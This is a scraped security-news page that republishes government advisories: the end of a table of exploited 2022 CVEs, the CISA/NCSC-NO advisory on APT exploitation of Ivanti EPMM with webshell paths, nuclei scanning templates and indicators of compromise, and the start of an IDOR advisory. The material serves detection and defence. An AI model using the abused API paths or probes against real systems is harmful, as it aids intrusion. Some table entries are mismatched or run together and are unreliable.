FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier
FortiOS – heap-based buffer overflow in sslvpnd
CVE-2022-24682
Zimbra
Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1) Collaboration Suite
Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release
CVE-2022-22536
SAP
NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53, and SAP Web Dispatcher Internet Communication Manager (ICM)
Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher
CISA Alert:
Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM)
CVE-2022-22963
VMware Tanzumware Tanzu
Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions
CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression
CVE-2022-22954
VMware
Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
Identity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3
vRealize Automation (vIDM), 8.x, 7.6
VMware Cloud Foundation (vIDM), 4.x
vRealize Suite Lifecycle Manager (vIDM), 8.xWorkspace
ONE Access and Identity Manager
VMware Advisory VMSA-2022-0011
CVE-2022-22960
VMware
Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
Identity Manager (vIDM) and vRealize Automation3.3.6, 3.3.5, 3.3.4, 3.3.3
vRealize Automation (vIDM), 8.x, 7.6
VMware Cloud Foundation (vIDM), 4.x
VMware Cloud Foundation (vRA), 3.x
vRealize Suite Lifecycle Manager (vIDM), 8.x
VMSA-2022-0011
CVE-2022-29464
AtlassianWSO2
WSO2 API Manager 2.2.0 and above through 4.0.0
WSO2 Identity Server 5.2.0 and above through 5.11.0
WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0
WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0
WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0
WSO2 Documentation – Spaces
CVE-2022-27924
Zimbra
Zimbra Collaboration Suite, 8.8.15 and 9.0
Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release
CVE-2022-1388
F5 Networks
F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and All 12.1.x and 11.6.x versions
K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388
Joint CSA:
Threat Actors Exploiting F5 BIG-IP CVE-2022-1388
CVE-2022-30190
Microsoft
Exchange Server, Multiple Versions
CISA Alert:
Microsoft Releases Workaround Guidance for MSDT “Follina” Vulnerability
CVE-2022-22047
Microsoft
Multiple Products
Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability, CVE-2022-22047
CVE-2022-27593
QNAP
Certain QNAP NAS running Photo Station with internet exposure Ausustor Network Attached Storage
DeadBolt Ransomware
CVE-2022-41082
Microsoft
Exchange Server 2016 Cumulative Update 23, 2019 Cumulative Update 12, 2019 Cumulative Update 11, 2016 Cumulative Update 22, and 2013 Cumulative Update 23
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2022-41082
ACSC Alert:
Vulnerability Alert – 2 new Vulnerabilities associated with Microsoft Exchange.
CVE-2022-40684
Fortinet
FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0
FortiOS / FortiProxy / FortiSwitchManager – Authentication bypass on administrative interface
Source de l’article sur us-cert.gov
Threat Actors Exploiting Ivanti EPMM Vulnerabilities
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
The Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2023-35078 and CVE-2023-35081. Advanced persistent threat (APT) actors exploited CVE-2023-35078 as a zero day from at least April 2023 through July 2023 to gather information from several Norwegian organizations, as well as to gain access to and compromise a Norwegian government agency’s network.
Ivanti released a patch for CVE-2023-35078 on July 23, 2023. Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability CVE-2023-35081 and released a patch for the second vulnerability on July 28, 2023. NCSC-NO observed possible vulnerability chaining of CVE-2023-35081 and CVE-2023-35078.
CVE-2023-35078 is a critical vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM) (formerly known as MobileIron Core). The vulnerability allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. CVE-2023-35081 enables actors with EPMM administrator privileges to write arbitrary files with the operating system privileges of the EPMM web application server. Threat actors can chain these vulnerabilities to gain initial, privileged access to EPMM systems and execute uploaded files, such as webshells.
Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices, and APT actors have exploited a previous MobileIron vulnerability. Consequently, CISA and NCSC-NO are concerned about the potential for widespread exploitation in government and private sector networks.
This CSA provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) obtained by NCSC-NO investigations. The CSA also includes a nuclei template to identify unpatched devices and detection guidance organizations can use to hunt for compromise. CISA and NCSC-NO encourage organizations to hunt for malicious activity using the detection guidance in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA. If no compromise is detected, organizations should still immediately apply patches released by Ivanti.
Download the PDF version of this report:
Download the .xml or .json file associated with this report:
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Overview
In July 2023, NCSC-NO became aware of APT actors exploiting a zero-day vulnerability in Ivanti Endpoint Manager (EPMM), formerly known as MobileIron Core, to target a Norwegian government network. Ivanti confirmed that the threat actors exploited CVE-2023-35078 and released a patch on July 23, 2023.[1] Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability, CVE-2023-35081, and released a patch for the second vulnerability on July 28, 2023.[2]
CVE-2023-35078 is a critical authentication bypass [CWE-288] vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core. The vulnerability allows unauthenticated access to specific application programming interface (API) paths. Threat actors with access to these API paths can access PII such as names, phone numbers, and other mobile device details of users on the vulnerable system; make configuration changes to vulnerable systems; push new packages to mobile endpoints; and access Global Positioning System (GPS) data if enabled.
According to Ivanti, CVE-2023-35078 can be chained with a second vulnerability CVE-2023-35081.[2] CVE-2023-35081 is directory traversal vulnerability [CWE-22] in EPMM. This vulnerability allows threat actors with EPMM administrator privileges the capability to write arbitrary files, such as webshells, with operating system privileges of the EPMM web application server. The actors can then execute the uploaded file.[2]
CISA added CVE-2023-35078 to its Known Exploited Vulnerabilities Catalog on July 25, 2023, and CVE-2023-35081 on July 31, 2023.
CISA and NCSC-NO are concerned about the potential for widespread exploitation of both vulnerabilities in government and private sector networks because MDM systems provide elevated access to thousands of mobile devices. Threat actors, including APT actors, have previously exploited a MobileIron vulnerability [3],[4].
APT Actor Activity
The APT actors have exploited CVE-2023-35078 since at least April 2023. The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy [T1090] to target infrastructure, and NCSC-NO observed the actors exploiting CVE-2023-35078 to obtain initial access to EPMM devices [T1190] and:
/mifs/aad/api/v2/authorized/users
to list users and administrators [T1087.002] on the EPMM device.The APT actors deleted some of their entries in Apache httpd logs [T1070] using
mi.war
, a malicious Tomcat application that deletes log entries based on the string inkeywords.txt
. The actors deleted log entries with the stringFirefox/107.0
.The APT actors used Linux and Windows user agents with
Firefox/107.0
to communicate with EPMM. Other agents were used; however, these user agents did not appear in the device logs. It is unconfirmed how the threat actors ran shell commands on the EPMM device; however, NCSC-NO suspects the actors exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands [T1059].The APT actors tunneled traffic [T1572] from the internet through Ivanti Sentry, an application gateway appliance that supports EPMM, to at least one Exchange server that was not accessible from the internet [T1090.001]. It is unknown how they tunneled traffic. NCSC-NO observed that the network traffic used the TLS certificate of the internal Exchange server. The APT actors likely installed webshells [T1505.003] on the Exchange server in the following paths [T1036.005]:
/owa/auth/logon.aspx
/owa/auth/logoff.aspx
/owa/auth/OutlookCN.aspx
NCSC-NO also observed
mi.war
on Ivanti Sentry but do not know how the actors placed it there.MITRE ATT&CK TACTICS AND TECHNIQUES
See Table 1—Table 7 for all referenced threat actor tactics and techniques in this advisory.
Table 1: APT Actors ATT&CK Techniques for Initial Access
Technique Title
ID
Use
Exploit Public-Facing Application
T1190
The APT actors exploited CVE-2023-35078 in public facing Ivanti EPMM appliances since at least April 2023.
Table 2: APT Actors ATT&CK Techniques for Execution
Technique Title
ID
Use
Command and Scripting Interpreter
T1059
The APT actors may have exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands.
Table 3: APT Actors ATT&CK Techniques for Discovery
Technique Title
ID
Use
Account Discovery: Domain Account
T1087.002
The APT actors exploited CVE-2023-35078 to gather EPMM device users and administrators.
Remote System Discovery
T1018
The APT actors retrieved LDAP endpoints.
Table 4: APT Actors ATT&CK Techniques for Persistence
Technique Title
ID
Use
Masquerading: Match Legitimate Name or Location
T1036.005
The APT actors likely installed webshells at legitimate Exchange server paths.
Server Software Component: Web Shell
T1505.003
The APT actors implanted webshells on the compromised infrastructure.
Table 5: APT Actor ATT&CK Techniques for Defense Evasion
Technique Title
ID
Use
Indicator Removal
T1070
APT actors deleted httpd access logs after the malicious activities took place using string
Firefox/107.0
.Table 6: APT Actor ATT&CK Techniques for Collection
Technique Title
ID
Use
Data from Local System
T1005
APT actors regularly checked EPMM Core audit logs.
Table 7: APT Actor ATT&CK Techniques for Command and Control
Technique Title
ID
Use
Protocol Tunneling
T1572
The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet.
Proxy
T1090
The actors leveraged compromised SOHO routers to proxy to and compromise infrastructure.
The actors tunneled traffic from the internet to at least one Exchange server.
Proxy: Internal Proxy
T1090.001
The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet.
EVIDENCE OF VULNERABILITY METHODS
CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-30578:
id: CVE-2023-35078-Exposure
info:
name: Ivanti EPMM Remote Unauthenticated API Access
author: JC
severity: critical
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-35078
description: Identifies vulnerable instances of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass.
tags: ivanti, mobileiron, epmm, auth-bypass
requests:
- method: GET
path:
- "{{RootURL}}/mifs/aad/api/v2/ping"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "vspVersion"
- "apiVersion"
condition: and
CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35081:
id: CVE-2023-35081
info:
name: Ivanti EPMM Remote Arbitrary File Write
author: JC
severity: High
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-35081
description: Identifies vulnerable unpatched versions of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10.0.3, 11.9.1.2, and 11.8.1.2 that allows an authenticated administrator to perform arbitrary file writes to the EPMM server.
tags: ivanti, mobileiron, epmm
requests:
- method: GET
path:
- "{{RootURL}}/mifs/c/windows/api/v2/device/registration"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: all
regex:
- '.*?VSP ((0?[0-9]|10)(.d+){1,3}|11.(0?[0-7])(.d+){1,2}|11.8.0(.d+)?|11.8.1.[0-1]|11.9.0(.d+)?|11.9.1.[0-1]|11.10.0.[0-2]).*'
Run the following NCSC-NO-created checks to check for signs of compromise:
syslogs
from EPMM devices for any occurrences of/mifs/aad/api/v2/
.EventCode=1644
in the AD since at least April 2023. The LDAP queries performed by EPMM when the threat actor used the MIFS API generated tens of millions of this event code. Also look for EventCodes4662
,5136
, and1153
.CN=EXCHANGE01
or similar.INCIDENT RESPONSE
If compromise is detected, organizations should:
MITIGATIONS
CISA and NCSC-NO recommend organizations:
# install rpm url https://support.mobileiron.com/ivanti-updates/ivanti-security-update-1.0.0-1.noarch.rp
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA and NCSC-NO recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
REFERENCES
[1] Ivanti: CVE-2023-35078 – Remote Unauthenticated API Access Vulnerability
[2] Ivanti: CVE-2023-35081 – Remote Arbitrary File Write
[3] CISA: Potential for China Cyber Response to Heightened U.S.-China Tensions
[4] CISA: Top Routinely Exploited Vulnerabilities
RESOURCES
ACKNOWLEDGEMENTS
Ivanti contributed to this joint advisory.
NCSC-NO wishes to acknowledge Mnemonic’s contributions.
VERSION HISTORY
August 1, 2023: Initial version.
August 2, 2023: Added stix file, updated Acknowledgements section, and added Resources section.
APPENDIX: INDICATORS OF COMPROMISE
NCSC-NO observed the following webshell hash:
c0b42bbd06d6e25dfe8faebd735944714b421388
NCSC-NO observed the following hash of
mi.war
:1cd358d28b626b7a23b9fd4944e29077c265db46
NCSC-NO observed the following JA3 hashes used against MobileIron Core:
2d5bd942ebf308df61e1572861d146f6
473cd7cb9faa642487833865d516e578
579ccef312d18482fc42e2b822ca2430
849d3331f3e07a0797a02f12a6a82aa9
8d9f7747675e24454cd9b7ed35c58707
ad55557b7cbd735c2627f7ebb3b3d493
cd08e31494f9531f560d64c695473da9
e1d8b04eeb8ef3954ec4f49267a783ef
e60dc8370ecf78cf115162fbc257baf5
e669667efb41c36f714c309243f41ca7
e84a32d43db750b206cb6beed08281d0
eb5fdc72f0a76657dc6ea233190c4e1c
NCSC-NO observed the following JA3 hashes used against Exchange when tunneling via EPMM Sentry:
0092ce298a1d451fbe93dc4237053a96
00e872019b976e69a874ee7433038754
01ecd9ab9be75e832c83c082be3bdf18
0212a88c7ed149febdefa347c610b248
02be3b93640437dbba47cc7ed5ab7895
03f8852448a85e14f2b4362194160c32
045f8ccdac6d4e769b30da406808da71
04e7f5787f89a597001b50a37b9f8078
070f9fe9f0ec69e6b8791d280fde6a48
07a624d7236cca3934cf1f8e44b74b52
09df72c01a1a0ad193e2fff8e454c9c4
0b28842d64a344c287e6165647f3b3fe
0b8e1211de50d244b89e6c1b366d3ccf
0cb0380cf75a863b3e40a0955b1ada9f
0da24834056873a8cd8311000088e8be
0e1fad8ffaa7a939f0a6cbf9cd7e2fcd
0f6e78839398c245d13f696a3216d840
119f8c9050d1499b6f958b857868b8ce
11c506d5e3fb7e119c4287202c96a930
1336df27f94b25a25acac9db3e61e461
14671c3f8deca7d73a03b74cb854c21d
146caf9bd0153428f54e9ef472154983
14994353f3ea6fd25952a8c7d57f9ecf
151bc875df15d1385e6eb02f9edaba06
15a074a397727b26a846b443b99c20ff
1660f3d882a4311ca013ee4586e01fd9
16a74fc216f8a4ce43466bb83b6d3fd2
188623fdd056c4ed13d1ff34c7377637
19f51486abd40c9f0fc0503559a6c523
1a024e63721c610d2e54e67d62cd5460
1aa7dae8f2ae0a29402ed51819f82db4
1abfdeaadb74a0f7c461e7bab157b17f
1b6720ed0b67c910a80722ce973d6217
1b7d9368c6ce7623fdbc43f013626535
1e0850e10a00c9bbdd5c582ff4cb6833
1ec71612e438cf902913eec993475eb9
206fed3a39d9215c35395663f5bb3307
22cc1b3bc9f99d3a520ae58fee79a0d5
23e3e6fa8b23d9bc19e82de4e64c79e9
253fd4659bf21be116858bc0f206c5b9
276e175d4fe8454c4c47e966d8cb3fa3
289a450c7478dd52a10c6ed2fb47f7e9
2aa8ba7478b1362274666d714df575bc
2beecb6b9e386f29d568229a9953c3d2
2ebc7fdceaa9a0df556e989d77157006
3003024afe64b4e8a5a30825c14bbb12
3082e669dda9d023e2dcd8b9549a84a8
309d33c6f77a3fc75654c44c61596ccd
30a9f568eb3df79352fc587a078623b6
30be84e6b95f44c203f8e7fce7339a8e
3268a5097a543c7dbd82c39a9193b7fe
32775ead3ea1ad7db2f4bea67fe0cabb
34ac9a6ef5d285119abec50fbe41fcfe
34d92552e278710c1e84f0bd8dc3a6b8
361f47a6357cc6e3a9bcdd20cfaaf0e9
3685abc75517e61e47e52e5f2d060f54
3744004013135b9f9a05cb58cda8134d
37d952966ea7e79277803f13d7147544
391a4c2c7541b8b78e2f99bf586e9794
393662e5aa0cb49c5d666a6d10a1ade6
3962b622c5aa815afb803b92aa948424
3b22af324abded2781ed8f6a61f3654f
3b30b4555cc8b4b164ad03cf322cbea8
3bd1bdb5e90b9590a8878bff2ada8204
3be529eb3a7daaf34f963a22188f6139
3dd13faad1c45eb0c23e4567210f7eac
403273b51f91cf3c333695e5532cb2c3
404f56045e436d53ead2177bf957ba39
41854adbc73b0b58e5c566f60bb0df25
43c22dabb1e6d2449a39c2f7e974d537
476e72bbda5b78d188766139889e3038
4898a51256ae7d914a5ffd5695973470
49230c486f0fd383cd301fe162d6a786
4959a611b9885022d81b4bc8e4b1d149
495c6ff7ca0379ad0891bac47917d09a
49d2bd08038dc7dada221008591940f9
4c1b73ec52e6eec0c5d20577fcbc9ef1
4d34db639ba84b11822fb3dac47ed7d1
5244b163f9326a1e5eaa8860f7543f99
539f1a5183800a96228458932f9307f7
5466368d4659f1b1470bcb09e65b484d
549cde6535a884126755fc53f59a820c
555389e92c622b87d3fc395fd8723501
588d0b42e54174a98e1eca59945e8b32
58bc21d305a65c41745327f142f3ac12
59401c9a60449c742d073d93d1b7039a
59eec218522cc5c7743a0d37892a3345
59faf75430e9326d3ae9d231bb3ae8c6
5d0259ca16cfc2d7d1b0fac69f29ab05
5d55026fb84dba91ac01e2095504b1bc
5e35f50c692081fd6c7ddac1272e2d6c
5f4d5965af741bba59b7c8d3425f33dd
6010282004917ecf3900babf61456432
6088c2a04c94cdcd5a283a6d1622ffba
61dee38d2f97220efb1218ad8971e3ab
62ac194f2526eb45485526bca35c8f43
634296a023280d020674c873d0199760
635755dadfab8b92fb502aafb09122db
63fc58be0d7b48eaa34da7f752ae8ae6
6441640409815cfb4bf469e685e1bdb5
646973d1928c401ba80961c12cbf84a2
65eef0a0ee257254ef0418aa57192cfb
66f6a192083a7ab00ae8e0b5cc52e8f4
67a42e2e27ffc26d1f3d0ceb8384afd0
689385f1218e0d4c347595648ca6a776
692f91c0c5e9e93e0a24bd3392887ca1
69ecf52960c8bd9e746dfe9ee19c11f6
6e359f3bbc622e9b1ed36f6e3d521bcf
6e3650528f719fc50988a1f697644832
6ead0d5d3f87911c27f3ae0a75e6b5bc
6f1fa8b444caf0d8238f948279ca74e1
6fb8cdf567dd7d89d53b5771d769cb5f
706b6055658aff067ae370f23831ef6b
708140c311d3d69418f75c928e7535a0
719ec5da8f2153a436ee8567ff609894
7292ef4cdca529071fad97496e1c9439
74871691eac48156ce0da2cfa3ab401a
74cf24f2a66a31c88b6fcfe01f12160c
75e874d8e0a79697633b87ea5e798b1c
76c0d09fed2f33babb0de8ee2c07144c
77a01363fa2b29af25c004da9570e23c
78988c65e9b70e7929e747408d8f0b0e
79c6d12d168b85437384b20eb94e106b
7b4137b4e85f31a81bb5bafeda993947
7b9db1d58326c1fa276ba2a39bcc2617
7cbc7459db5327c26476549f225030f5
7cd727171c2522f51417edeeba4f1791
7e3630c67c802eabb67b108ad4d7ded7
802f5d34c230da40c0912a1c5a9b702b
80bd0f3610f6c4d60584a5be0b8a3016
819030799f0020ed724c2ef3ffaa56c6
8207129585da68066ed08e94216d76ee
821f649d08687e22f96cea99fbb5d3a3
830838cb0620d659405a74401cd72557
833d3201066f5184c874c73a2083c448
840f488b7c0a5d686d1e89908735f354
84301b967a4d9a242466c04901bad691
85c3fac6a9885362c448f434671e362f
883b9fe16e45c388968defc73a5fba7a
8a6b0ba3496eeca39d6d3f9bae830c90
8ad0fd4b78c89bd63b97343fda1eeccb
8b0ae9029974091df12210255aaecad6
8b297f8b219e968932293ee7a8242ca3
8bb1781e756a53cd00d9b2ec670fa21e
8d5515351afdf27b013f96a05bf45147
8fafa73e9985e05d0c1c964da770c567
905967b08bd44cfa60d969229921ac23
9188ef45ea917a91ec9b92b5dd8cd90d
918dfab0333ae15d61f14fd24b5eaaac
922a3272aad17c9eaad733696a4321da
9253399537fad8448f1d4732dd79f6fa
934a8a6528e91caa019acb76e791a71d
95588e0386206fa02912cfcaf18c1220
9610328cdaa4694800c2c93410f8ce82
9622902cc43f4a20d0d686a37e4d8232
96c41e4c4a1812187fb279b9299ad63b
984c4653a563b19c87f264611a6adc01
9980febfaf901d4113a1c473f79d7eb6
9a176d818edff838fc057cea3ee372c0
9ba21c5148913186a5bf877078cbc048
9cfda02ef7e04c469b77f8197a249c17
9d74d395bd2f72a47a5c980e6040df5a
9df128ebe0c82064aa746647883112c9
9e5613533972a9d42d2e3344a4e58566
9ec17429eed5446e3720796ab50d8c60
9f2438aaab4744c4b7b5b7287a783099
9f3bf94572344b36f6ef1689cb30c66e
9fdd7a85b3a4ef8ded73beb3e6218109
a1b732a9af792f75a68ed78d72ffb8f6
a260d836428cdb971bdf147ca6940160
a4f11b1eb659869a0ae70898a4a0e5ee
a596ebbcf438980c880d711315e4fdf1
a80b6a354b493264f37aa39d0d41b5fc
a89df6156eb5a2de196388d4a123b470
a96837fe533247abb7f88000d0216a50
a98cf0a359f430a00f4f3d522f5b6cc0
aa2fe3a253e169b05e1782ca57a688d2
aef0172a2c03f77912de0bbf14aee00f
af06c3e72f2f307515ba549174d8e5a6
b311ab82b30f41b12cb9089d00c4a1ff
b4f31423445b5f13675f205ac997f41f
b50666c9aed1c2f222c56b6e9b326d27
b53f179b3f25f72bb0c7ccf45bf8beee
b57f3e41c03803306b0ee2111f7ef823
b79434613820faf30d58f103c4415a29
b8366aaa5ed51c0dea3fc90ef7e14889
b8f6b0d234a305c25411e83fd430c624
b956ed2b848dabb4e79ab7358233861b
b9ecb08402df0f1f6e1ce76b8ad6e91f
ba4a616c8d4ab9358a82b321d8e618bf
bcd62f3e029f96f62c24d50d2d1402ac
bcf75736d176394f3df69f3e0ef7dd9f
be1f24457141d80206bc2e58f55dc879
c013f308d170aa2eca4a5b0f0bbd3ccb
c0a2fd066c955137036f92da2c3a3ff1
c17b3ec40ed5216e44311138aafaea2c
c262a39f49604f05a5656213f758cd46
c66f36eb180438882133717c3abb5157
c986c7bf720ce1463c3d628d2b3dad01
c9c16287cbbe5a037244e374ba84aecc
cbcd728a2350712b5747cd3447473deb
cbeeb123efe8cf7f842426b673415c28
ccb15eef4287c8efa472915bcb4ec458
ccdddb69e9344a039c4ac9c49a6f2d7b
cd1312be032256a10cf866af3e9afae9
ce0dd163d9e02bfd42d61024523cb134
ceef2e728db1b5ae15432f844eeb66e1
d12d98a0877f6e3c8b5a59f41cc4de9b
d131f17689f1f585e9bfdcdb72a626bb
d173076d97a0400a56c81089912b9218
d255291bb8e460626cb906ebacc670e5
d2cea317778ad6412c458a8a33b964fd
d3cfee76468a9556fd9d017c1c8ee028
d3d72f4c7038f7313ad0570e16c293bf
d485a1b5db2f97dc56500376d677aa89
d662d20507bebc37b99a4d413afa2752
d711d577b9943ab4e2f8a2e06bb963e3
d92e87d2689957765987e2be732d728e
d966c6c822122e96f6e9f5f1d4778391
daee31d7cc6e08ead6afad2175989e1d
dbb293176747fa1c2e03cbc09433f236
dc26ef761c7ec40591b1fe6e561b521d
dc9e6edeb7557bc80be68be15cebb77a
dddfbae77336120febd5ad690af3e341
e1f579227327ebb21cde3f9e7511db01
e3c642432a815a07f035e01308aaa8fc
e54329351788661f2a8d4677a759fc42
e82b7ad2c05f4617efbc86a78c1e61e9
e99cffa2afa064625f09e1c5aca8f961
ea6bd3db104ca210b5ad947d46134aaf
eb277d809a59d39d02605c0edd9333e9
ed82a50d98700179c8ae70429457477a
ef35374f4146b3532f0902d6f7f0ef8c
ef4c4d79f02ac404f47513d3a73e20c7
f05a5a60ad6f92d6f28fa4f13ded952f
f0776dfe17867709fdb0e0183ed71698
f20fbfd508e24d50522eadf0186b03eb
f3d751b0585855077b46dfce226cfea1
f4dd9bb28d680a3368136fb3755e7ea9
f804388f302af1f999e4664543c885a1
f8bcc8f99a3afde66d7f5afb5d8f1b43
f8d6f89aecf792e844e72015c9f27c95
f967460f8c6de1cedb180c90c98bfe98
f9d5cc0cbae77ea1a371131f62662b6b
fa4f1a3b215888bc5f19b9f91ba37519
fdff2bf247a7dad40bac228853d5a661
fe6e7fac4f0b4f25d215e28ca8a22957
fe9de1cdd645971c5d15ee1873c3ff8d
febba89b4b9a9649b3a3bf41c4c7d853
NCSC-NO observed the following user agents communicating with Exchange (OWA and EWS):
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
NCSC-NO observed the following user agents communicating with Exchange webshell:
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A306 Safari/6531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Mozilla/5.0 (Linux; Android 7.0; Moto C Build/NRD90M.059) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.02272.101 Safari/537.36
Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J120M Build/LMY47X) AppleWebKit/537.36 (KHTML, Like Gecko) SamsungBrowser/6.4 Chrome/56.0.2924.87 Mobile Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 9_0_2 like Mac OS X) AppleWebKit/601.1.45 (KHTML, like Gecko) Version/9.0 Mobile/13A452 Safari/601.1
NCSC-NO observed the following user agents communicating with Exchange Autodiscover:
ExchangeServicesClient/15.00.0913.015
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/114.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.0.0
NCSC-NO observed the following user agents communicating with EWS (/ews/Exchange.asmx):
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 Edg/103.0.1264.49
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
NCSC-NO observed the following user agent communicating with Exchange (/powershell):
Windows WinRM Client
Source de l’article sur us-cert.gov
Preventing Web Application Access Control Abuse
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationSUMMARY
The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), U.S. Cybersecurity and Infrastructure Security Agency (CISA), and U.S. National Security Agency (NSA) are releasing this joint Cybersecurity Advisory to warn vendors, designers, and developers of web applications and organizations using web applications about insecure direct object reference (IDOR) vulnerabilities. IDOR vulnerabilities are access control vulnerabilities enabling malicious actors to modify or delete data or access sensitive data by issuing requests to a website or a web application programming interface (API) specifying the user identifier of other, valid users. These requests succeed where there is a failure to perform adequate authentication and authorization checks.
These vulnerabilities are frequently exploited by malicious actors in data breach incidents because they are common, hard to prevent outside the development process, and can be abused at scale. IDOR vulnerabilities have resulted in the compromise of personal, financial, and health information of millions of users and consumers.
ACSC, CISA, and NSA strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce prevalence of IDOR flaws and protect sensitive data in their systems.
Download the PDF version of this report:
TECHNICAL DETAILS
Description
IDOR vulnerabilities are access control vulnerabilities in web applications (and mobile phone applications [apps] using affected web API) that occur when the application or API uses an identifier (e.g., ID number, name, or key) to directly access an object (e.g., a database record) but does not properly check the authentication or authorization of the user submitting the request. Depending on the type of IDOR vulnerability, malicious actors can access sensitive data, modify or delete objects, or access functions.
Typically, these vulnerabilities exist because an object identifier is exposed, passed externally, or easily guessed—allowing any user to use or modify the identifier.
Impact
These vulnerabilities are common[1] and hard to prevent outside the development process since each use case is unique and cannot be mitigated with a simple library or security function. Additionally, malicious actors can detect and exploit them at scale using automated tools. These factors place end-user organizations at risk of data leaks (where information is unintentionally exposed) or large-scale data breaches (where a malicious actor obtains exposed sensitive information). Data leaks or breaches facilitated by IDOR vulnerabilities include:
MITIGATIONS
Vendors and Developers
ACSC, CISA, and NSA recommend that vendors, designers, and implementors of web applications—including organizations that build and deploy software (such as HR tools) for their internal use and organizations that create open-source projects—implement the following mitigations. These mitigations may reduce prevalence of IDOR vulnerabilities in software and help ensure products are secure-by-design and -default.
